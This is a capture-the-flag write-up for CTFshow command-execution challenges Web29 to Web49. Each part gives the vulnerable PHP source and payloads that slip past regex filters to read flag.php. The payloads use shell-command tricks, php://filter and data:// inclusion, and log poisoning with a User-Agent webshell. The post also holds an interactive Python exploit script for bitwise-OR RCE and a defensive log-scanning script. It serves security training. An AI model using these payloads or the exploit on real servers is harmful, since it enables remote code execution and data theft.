[CTFshow Command Execution Web29-52] 2021.8.17 CTFshow practice

This post was last updated on 18 August 2021 at 1:39 PM

Web29

Open the challenge; the page shows the following source:

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:26:48
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        eval($c);
    }

}else{
    highlight_file(__FILE__);
}

The eval function executes the string code as PHP code.

Since eval executes PHP code, first send a payload to see which files are in the current directory:

http://c73de11b-5401-45ca-8d51-4c0bd417145b.challenge.ctf.show:8080/?c=system('ls');

Next we read flag.php, but the keyword flag is blocked by the regex, so we have to get around the keyword flag to read the file.

?c=system("cat fla''g.php");
?c=system("cat fla\g.php");

Backtick command substitution also works:

?c=system("cat `ls`");

Wildcards also work:

?c=system("cat *");
?c=system("cat ????.php");

Official payload:

?c=echo `nl fl''ag.php`;

Here nl is a Linux command similar to cat, except that nl prefixes every output line with a line number.

Web30

The challenge source is as follows:

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:42:26
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php/i", $c)){
        eval($c);
    }

}else{
    highlight_file(__FILE__);
}

The three keywords flag, system and php are filtered.

Besides system, PHP can run system commands through exec, passthru and shell_exec.

Here is the payload directly:

?c=passthru("cat ????.???");

The exec function also works:

?c=echo exec("cat ????.???");

Note: exec only returns the last line of the command's output, and the result has to be echoed to be displayed; this challenge was lucky in that the flag is on the last line.

shell_exec also works:

?c=echo shell_exec("cat ????.???");

Official payload:

?c=echo `nl fl''ag.p''hp`;

Web31

The code is as follows:

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:49:10
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
        eval($c);
    }

}else{
    highlight_file(__FILE__);
}

Filtered: flag, system, php, cat, sort, shell, the period, the space and the single quote.

In PHP the space can be replaced with %09 (a tab, which the shell also treats as a word separator):

?c=echo(`nl%09*`);

The more command also works:

?c=passthru("more%09f*");

cat is filtered, so tac can be used instead:

?c=passthru("tac%09f*");

You can also POST an extra variable and then connect with AntSword, and so on:

?c=passthru($_POST[a]);
POSTDATA: a=cat flag.php

Official hint:

show_source(next(array_reverse(scandir(pos(localeconv())))));

This hint roughly follows the GXYCTF2019 parameterless RCE challenge: [PHP parameterless RCE] GXYCTF2019 禁止套娃 | Mocha–Just a novice (xiinnn.com)

?c=show_source(array_rand(array_flip(scandir(current(localeconv())))));
# refresh a few times until it comes up

Web32

Open the challenge:

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:56:31
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
        eval($c);
    }

}else{
    highlight_file(__FILE__);
}

Filtered: flag, system, php, cat, sort, shell, the period, the space, the single quote, the backtick, echo, the semicolon and the left parenthesis.

Since eval executes PHP code, we use include to perform a file inclusion. Because the semicolon is filtered, the statement is terminated with the closing tag ?> instead (PHP treats ?> as an implicit semicolon), and the file name is supplied through a second parameter a so that flag, php and the period never appear in c.

?c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php
Result:
PD9waHANCg0KLyoNCiMgLSotIGNvZGluZzogdXRmLTggLSotDQojIEBBdXRob3I6IGgxeGENCiMgQERhdGU6ICAgMjAyMC0wOS0wNCAwMDo0OToxOQ0KIyBATGFzdCBNb2RpZmllZCBieTogICBoMXhhDQojIEBMYXN0IE1vZGlmaWVkIHRpbWU6IDIwMjAtMDktMDQgMDA6NDk6MjYNCiMgQGVtYWlsOiBoMXhhQGN0ZmVyLmNvbQ0KIyBAbGluazogaHR0cHM6Ly9jdGZlci5jb20NCg0KKi8NCg0KJGZsYWc9ImN0ZnNob3d7Nzc0NDkxYTQtN2JlZi00ODhlLWE3M2QtZDQ4N2M1ZmZkNGIxfSI7DQo=
After base64 decoding:
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:49:19
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:49:26
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

$flag="ctfshow{774491a4-7bef-488e-a73d-d487c5ffd4b1}";

Official hint:

c=$nice=include$_GET["url"]?>&url=php://filter/read=convert.base64-encode/resource=flag.php

Web33

Open the challenge:

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 02:22:27
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
//
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\"/i", $c)){
        eval($c);
    }

}else{
    highlight_file(__FILE__);
}

Filtered: flag, system, php, cat, sort, shell, the period, the space, the single quote, the backtick, echo, the semicolon, the left parenthesis and the double quote.

Same payload as the previous challenge:

?c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php
Result:
PD9waHANCg0KLyoNCiMgLSotIGNvZGluZzogdXRmLTggLSotDQojIEBBdXRob3I6IGgxeGENCiMgQERhdGU6ICAgMjAyMC0wOS0wNCAwMDo0OToxOQ0KIyBATGFzdCBNb2RpZmllZCBieTogICBoMXhhDQojIEBMYXN0IE1vZGlmaWVkIHRpbWU6IDIwMjAtMDktMDQgMDA6NDk6MjYNCiMgQGVtYWlsOiBoMXhhQGN0ZmVyLmNvbQ0KIyBAbGluazogaHR0cHM6Ly9jdGZlci5jb20NCg0KKi8NCg0KJGZsYWc9ImN0ZnNob3d7N2EzMzE3ODQtOWEyYS00Mzk5LTg3MDgtNDE5ZjlhZWMxN2Y5fSI7DQo=
After decoding:
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:49:19
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:49:26
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

$flag="ctfshow{7a331784-9a2a-4399-8708-419f9aec17f9}";

Official hint:

c=?><?=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

Web34

Open the challenge:

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 04:21:29
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"/i", $c)){
        eval($c);
    }

}else{
    highlight_file(__FILE__);
}

Filtered: flag, system, php, cat, sort, shell, the period, the space, the single quote, the backtick, echo, the semicolon, the left parenthesis, the colon and the double quote.

Same payload as the previous two challenges:

?c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php
Result:
PD9waHANCg0KLyoNCiMgLSotIGNvZGluZzogdXRmLTggLSotDQojIEBBdXRob3I6IGgxeGENCiMgQERhdGU6ICAgMjAyMC0wOS0wNCAwMDo0OToxOQ0KIyBATGFzdCBNb2RpZmllZCBieTogICBoMXhhDQojIEBMYXN0IE1vZGlmaWVkIHRpbWU6IDIwMjAtMDktMDQgMDA6NDk6MjYNCiMgQGVtYWlsOiBoMXhhQGN0ZmVyLmNvbQ0KIyBAbGluazogaHR0cHM6Ly9jdGZlci5jb20NCg0KKi8NCg0KJGZsYWc9ImN0ZnNob3d7MzRmMDJhZWEtZTQwYi00YTA5LTliZGUtYjQyYjBiMTZhNWFlfSI7DQo=
After decoding:
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:49:19
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 00:49:26
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

$flag="ctfshow{34f02aea-e40b-4a09-9bde-b42b0b16a5ae}";

Official hint:

c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

Web35

Open the challenge:

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 04:21:23
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=/i", $c)){
        eval($c);
    }

}else{
    highlight_file(__FILE__);
}

Filtered: flag, system, php, cat, sort, shell, the period, the space, the single quote, the backtick, echo, the semicolon, the left parenthesis, the colon, the double quote, the less-than sign and the equals sign.

Same payload as the previous three challenges:

?c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php
Result:
PD9waHANCg0KLyoNCiMgLSotIGNvZGluZzogdXRmLTggLSotDQojIEBBdXRob3I6IGgxeGENCiMgQERhdGU6ICAgMjAyMC0wOS0wNCAwMDo0OToxOQ0KIyBATGFzdCBNb2RpZmllZCBieTogICBoMXhhDQojIEBMYXN0IE1vZGlmaWVkIHRpbWU6IDIwMjAtMDktMDQgMDM6Mzc6MTENCiMgQGVtYWlsOiBoMXhhQGN0ZmVyLmNvbQ0KIyBAbGluazogaHR0cHM6Ly9jdGZlci5jb20NCg0KKi8NCg0KJGZsYWc9ImN0ZnNob3d7YTM1MzM1OGEtN2IzMC00YWNlLWFmODAtNzZhYmUxZDE4MjZmfSI7
After decoding:
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:49:19
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 03:37:11
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

$flag="ctfshow{a353358a-7b30-4ace-af80-76abe1d1826f}";

Official hint:

c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

Web36

Open the challenge:

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 04:21:16
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=|\/|[0-9]/i", $c)){
        eval($c);
    }

}else{
    highlight_file(__FILE__);
}

Filtered: flag, system, php, cat, sort, shell, the period, the space, the single quote, the backtick, echo, the semicolon, the left parenthesis, the colon, the double quote, the less-than sign, the equals sign, the slash and the digits 0-9.

Same payload as the previous four challenges (the parameter name a contains no digit, so the digit filter does not matter):

?c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php
Result:
PD9waHANCg0KLyoNCiMgLSotIGNvZGluZzogdXRmLTggLSotDQojIEBBdXRob3I6IGgxeGENCiMgQERhdGU6ICAgMjAyMC0wOS0wNCAwMDo0OToxOQ0KIyBATGFzdCBNb2RpZmllZCBieTogICBoMXhhDQojIEBMYXN0IE1vZGlmaWVkIHRpbWU6IDIwMjAtMDktMDQgMDM6Mzc6MTENCiMgQGVtYWlsOiBoMXhhQGN0ZmVyLmNvbQ0KIyBAbGluazogaHR0cHM6Ly9jdGZlci5jb20NCg0KKi8NCg0KJGZsYWc9ImN0ZnNob3d7NDNkZTFhNDQtZGQyMy00OWVlLWI1OTMtZjFhMTZiZWMxZDk1fSI7
After decoding:
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:49:19
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 03:37:11
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

$flag="ctfshow{43de1a44-dd23-49ee-b593-f1a16bec1d95}";

Official hint:

c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php

Web37

Open the challenge:

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 05:18:55
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c);
        echo $flag;

    }

}else{
    highlight_file(__FILE__);
}

flag is filtered, and the variable c is passed to include.

The first method uses the data wrapper to execute commands:

?c=data://text/plain,<?php system("cat ****.php");?>
?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==

The second method is log injection (the PHP code is placed in the User-Agent, which nginx writes into its access log):

GET / HTTP/1.1
Host: e6a72e9f-9d8b-4cde-9379-114f9c718713.challenge.ctf.show:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) <?php @eval($_POST['a']);?>Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Then connect with AntSword:

?c=/var/log/nginx/access.log
password: a

Official hint:

data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
View the page source, or get a shell by including the log file

Web38

Open the challenge:

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 05:23:36
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|php|file/i", $c)){
        include($c);
        echo $flag;

    }

}else{
    highlight_file(__FILE__);
}

Same as the previous challenge.

The first method is the data wrapper, using base64 so that the filtered words do not appear in the parameter:

?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==

The second method is log injection.

Official hint:

nginx log file: /var/log/nginx/access.log
data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==
View the page source, or get a shell by including the log file
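The log-poisoning and wrapper-inclusion requests used in Web37 and Web38 leave distinctive traces in the web server's own access log. The following Python script is an added example, not part of the original post or of ctf.show: it parses constructed nginx combined-format lines (the IPs, timestamps and requests are made up for this example and modelled on the requests above) and flags a PHP open tag in the User-Agent or Referer, stream wrappers or PHP code in query parameters, and attempts to include the log file itself. The indicator names and the regular expressions are this example's own choices.

```python
import re
from urllib.parse import unquote

# Constructed nginx "combined"-format lines; the IPs, timestamps and
# requests are made up for this example, modelled on the requests the
# writeup sends (PHP tag in the User-Agent, then including the log file
# or a data:// / php://filter wrapper through ?c=).
SAMPLE_LOG = r'''
10.0.0.5 - - [17/Aug/2021:14:40:15 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"
10.0.0.7 - - [17/Aug/2021:14:41:02 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) <?php @eval($_POST['a']);?>Gecko/20100101 Firefox/68.0"
10.0.0.7 - - [17/Aug/2021:14:41:30 +0000] "GET /?c=/var/log/nginx/access.log HTTP/1.1" 200 9812 "-" "curl/7.68.0"
10.0.0.9 - - [17/Aug/2021:14:42:11 +0000] "GET /?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg== HTTP/1.1" 200 88 "-" "curl/7.68.0"
10.0.0.9 - - [17/Aug/2021:14:43:05 +0000] "GET /?c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php HTTP/1.1" 200 540 "-" "curl/7.68.0"
'''

# One line of the nginx "combined" log format. nginx escapes '"' and '\'
# inside fields as \xNN, so "no literal quote inside a field" holds.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Indicators drawn from the techniques in this writeup.
PHP_TAG_RE = re.compile(r'<\?(php|=)', re.IGNORECASE)       # PHP open tag in a header: log poisoning
WRAPPER_RE = re.compile(r'\b(php|data)://', re.IGNORECASE)   # stream wrappers fed to include()
LOG_PATH_RE = re.compile(r'/var/log/|access\.log|error\.log', re.IGNORECASE)
CODE_RE = re.compile(
    r'\$_(GET|POST|REQUEST|COOKIE)\b|\b(eval|include|require|system|passthru|shell_exec)\b',
    re.IGNORECASE,
)


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def query_params(target):
    """Split the query string by hand, so the result does not depend on the
    Python version's parse_qs separator rules (';' occurs inside data: URLs)."""
    query = target.partition('?')[2]
    params = []
    for pair in query.split('&'):
        if pair:
            name, _, value = pair.partition('=')
            params.append((unquote(name), unquote(value)))
    return params


def inspect(entry):
    """Return the list of indicator labels that fire for one parsed entry."""
    findings = []
    if PHP_TAG_RE.search(entry['ua']) or PHP_TAG_RE.search(entry['referer']):
        findings.append('php-tag-in-header')
    for name, value in query_params(entry['target']):
        if CODE_RE.search(value):
            findings.append(f'php-code-in-param:{name}')
        if WRAPPER_RE.search(value):
            findings.append(f'stream-wrapper:{name}')
        if LOG_PATH_RE.search(value):
            findings.append(f'log-file-include:{name}')
    return findings


def scan_log(text):
    """Return (ip, target, findings) for every line that raises at least one indicator."""
    hits = []
    for line in text.strip().splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        findings = inspect(entry)
        if findings:
            hits.append((entry['ip'], entry['target'], findings))
    return hits


if __name__ == '__main__':
    for ip, target, findings in scan_log(SAMPLE_LOG):
        print(ip, target, ', '.join(findings))
```

Run it directly to print the flagged lines; scan_log returns the findings so the same logic can be wired into a log pipeline. The first benign line produces nothing, the poisoned User-Agent is caught before the attacker ever includes the log, and the later include of /var/log/nginx/access.log is the second half of the same chain, which is why both indicators belong in one rule set.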

Web39

Open the challenge:

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 06:13:21
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c.".php");
    }

}else{
    highlight_file(__FILE__);
}

Payload using the data wrapper:

?c=data://text/plain,<?php system($_POST[a]);?>
POSTDATA:
a=cat%20flag.php

Note: base64 cannot be used in this challenge, otherwise the POST data will not be executed.

Official hint:

data://text/plain, this amounts to executing the PHP statement followed by .php; because the PHP statement before it is already closed, the trailing .php is treated as HTML and simply displayed on the page, so it has no effect

Web40

Open the challenge:

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-04 00:12:34
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-04 06:03:36
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/


if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){
        eval($c);
    }

}else{
    highlight_file(__FILE__);
}

A large set of characters is filtered; this is effectively the same as the GXYCTF2019 禁止套娃 challenge and requires parameterless RCE (function calls whose only arguments are the return values of other calls).

[PHP parameterless RCE] GXYCTF2019 禁止套娃 | Mocha–Just a novice (xiinnn.com)

First list the files in the directory. localeconv() returns an array whose first element is decimal_point, which is "." under the default locale, so current() (or pos()) of it yields ".", the current directory:

?c=print_r(scandir(current(localeconv())));

flag.php is the second-to-last entry, so reverse the array and use next to read flag.php:

?c=highlight_file(next(array_reverse(scandir(current(localeconv())))));

Alternatively, pick a random entry from the array (luck-based; refresh a few times):

?c=readfile(array_rand(array_flip(scandir(current(localeconv())))));

Another option is to obtain the parameter through the cookie for command execution; see the earlier post:

[PHP parameterless RCE] GXYCTF2019 禁止套娃 | Mocha–Just a novice (xiinnn.com)

Official hint:

show_source(next(array_reverse(scandir(pos(localeconv()))))); GXYCTF's 禁止套娃 challenge; obtain the parameter through the cookie for command execution
c=session_start();system(session_id());
passid=ls

Web41

Open the challenge:

<?php

/*
# -*- coding: utf-8 -*-
# @Author: 羽
# @Date: 2020-09-05 20:31:22
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 22:40:07
# @email: 1341963450@qq.com
# @link: https://ctf.show

*/

if(isset($_POST['c'])){
    $c = $_POST['c'];
    if(!preg_match('/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/i', $c)){
        eval("echo($c);");
    }
}else{
    highlight_file(__FILE__);
}
?>

Compared with the previous challenge, letters are also filtered, but the pipe character is not, which means we can use bitwise OR on strings to build the letters and achieve RCE.

Here are the scripts directly.

First, a PHP script: it iterates over all byte values in a double loop, skipping any byte the challenge's regex would reject; whenever the OR of two surviving bytes is a printable character, it saves the character and the two bytes (URL-encoded) to rce_or.txt.

<?php
$myfile = fopen("rce_or.txt", "w");
$contents = "";
for ($i = 0; $i < 256; $i++) {
    for ($j = 0; $j < 256; $j++) {

        if ($i < 16) {
            $hex_i = '0' . dechex($i);
        } else {
            $hex_i = dechex($i);
        }
        if ($j < 16) {
            $hex_j = '0' . dechex($j);
        } else {
            $hex_j = dechex($j);
        }
        // Skip any byte that the challenge's regex would reject
        $preg = '/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/i';
        if (preg_match($preg, hex2bin($hex_i)) || preg_match($preg, hex2bin($hex_j))) {
            echo "";
        } else {
            $a = '%' . $hex_i;
            $b = '%' . $hex_j;
            $c = (urldecode($a) | urldecode($b));
            // Keep the pair only when the OR result is printable ASCII
            if (ord($c) >= 32 && ord($c) <= 126) {
                $contents = $contents . $c . " " . $a . " " . $b . "\n";
            }
        }

    }
}
fwrite($myfile, $contents);
fclose($myfile);

After the PHP script has run, rce_or.txt is generated in the same directory.

Next we use a Python script:

# -*- coding: utf-8 -*-
import requests
import urllib.parse
from sys import argv

if len(argv) != 2:
    print("=" * 50)
    print('USAGE: python exp.py <url>')
    print("eg: python exp.py http://ctf.show/")
    print("=" * 50)
    exit(0)
url = argv[1]


def action(arg):
    # For every character of arg, look up in rce_or.txt a pair of
    # filter-safe bytes whose bitwise OR gives that character, and
    # build the two URL-encoded strings to be OR-ed together.
    s1 = ""
    s2 = ""
    for i in arg:
        f = open("rce_or.txt", "r")
        while True:
            t = f.readline()
            if t == "":
                break
            if t[0] == i:
                s1 += t[2:5]
                s2 += t[6:9]
                break
        f.close()
    output = "(\"" + s1 + "\"|\"" + s2 + "\")"
    return output


while True:
    param = action(input("\n[+] your function:")) + action(input("[+] your command:"))
    data = {
        'c': urllib.parse.unquote(param)
    }
    r = requests.post(url, data=data)
    print("\n[*] result:\n" + r.text)

Note: run it with Python 3!

Official hint:

https://blog.csdn.net/miuzzx/article/details/108569080

Web42

Open the challenge:

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 20:51:55
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
    $c=$_GET['c'];
    system($c." >/dev/null 2>&1");
}else{
    highlight_file(__FILE__);
}

The code appends >/dev/null 2>&1 to discard the output, but a semicolon ends the first command, so the redirect only applies to the empty command after it and the first command's output still reaches the page. Pass a value to c:

?c=ls;

Two files are listed.

Read flag.php to get the flag:

?c=cat flag.php;

Official hint:

cat flag.php%0a view the page source

Web43

Open the challenge:

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 21:32:51
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

The semicolon and cat are filtered, so use %0a (a newline, which the shell also treats as a command separator) in place of the semicolon and tac in place of cat.

The payload is:

?c=tac%20flag.php%0a

Or use more instead:

?c=more%20flag.php%0a

Or use nl instead:

?c=nl%20flag.php%0a

Official hint:

nl flag.php%0a view the page source

Web44

Open the challenge:

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 21:32:01
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/;|cat|flag/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

One more word is filtered than in the previous challenge: flag.

The payload is:

?c=tac%20****.php%0a
?c=more%20****.php%0a
?c=nl%20****.php%0a

Official hint:

nl fla*.php%0a view the page source

Web45

Open the challenge:

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 21:35:34
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| /i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

One more character is filtered than in the previous challenge: the space. There are several ways to get around a space:

  • ${IFS}
  • ${IFS}$1
  • $IFS$1
  • <>
  • <
  • %09 (requires a PHP environment)

So the payload can be:

?c=tac${IFS}fla*.php%0a
?c=tac${IFS}$1fla*.php%0a

Or replace tac with nl, more, tail, sort, less, head, etc.

Official hint:

echo$IFS`tac$IFS*`%0A

Web46

Open the challenge:

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 21:50:19
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

Filtered: the semicolon, cat, flag, the space, digits, $ and the asterisk.

The payload is:

?c=tac<>fla\g.php||
?c=nl<fla''g.php||

And so on; combine the pieces as you like!

Official hint:

nl<fla''g.php||

Web47

Open the challenge:

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 21:59:23
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

The regex filters a lot more, but neither nl nor tac is on the list.

Straight to the payload:

?c=nl<fla''g.php||
?c=tac<>fla''g.php||

Official hint:

nl<fla''g.php||

Web48

Open the challenge:

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 22:06:20
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

Even more is filtered than in the previous challenge, but the same two readers still get through.

Straight to the payload:

?c=tac<>fla''g.php||
?c=nl<fla\g.php||

Official hint:

nl<fla''g.php||

Web49

Open the challenge:

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 22:22:43
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}

Same payload as the previous challenge (the % in the regex is matched against the already URL-decoded parameter, so %27 and %0a in the URL still work):

?c=tac<>fla%27%27g.php%0a
